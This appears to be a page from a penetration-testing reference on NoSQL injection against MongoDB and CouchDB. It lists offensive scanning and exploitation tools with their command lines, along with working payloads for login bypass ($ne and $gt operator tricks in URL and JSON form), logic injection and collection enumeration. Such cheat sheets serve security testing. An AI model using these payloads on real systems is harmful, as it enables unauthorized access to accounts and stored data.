Pentest Book
Search…
NoSQL (MongoDB, CouchDB)
1
# Tools
2
# https://github.com/codingo/NoSQLMap
3
python NoSQLMap.py
4
# https://github.com/torque59/Nosql-Exploitation-Framework
5
python nosqlframework.py -h
6
# https://github.com/Charlie-belmer/nosqli
7
nosqli scan -t http://localhost:4000/user/lookup?username=test
8
# https://github.com/FSecureLABS/N1QLMap
9
./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --extract travel-sample
10
11
# Payload:
12
' || 'a'=='a
13
14
mongodbserver:port/status?text=1
15
16
# in URL
17
username[$ne]=toto&password[$ne]=toto
18
19
##in JSON
20
{"username": {"$ne": null}, "password": {"$ne": null}}
21
{"username": {"$gt":""}, "password": {"$gt":""}}
22
23
- Trigger MongoDB syntax error -> ' " \ ; { }
24
- Insert logic -> ' || '1' == '1' ; //
25
- Comment out -> //
26
- Operators -> $where $gt $lt $ne $regex
27
- Mongo commands -> db.getCollectionNames()
Copied!
Last modified 9mo ago
Export as PDF
Copy link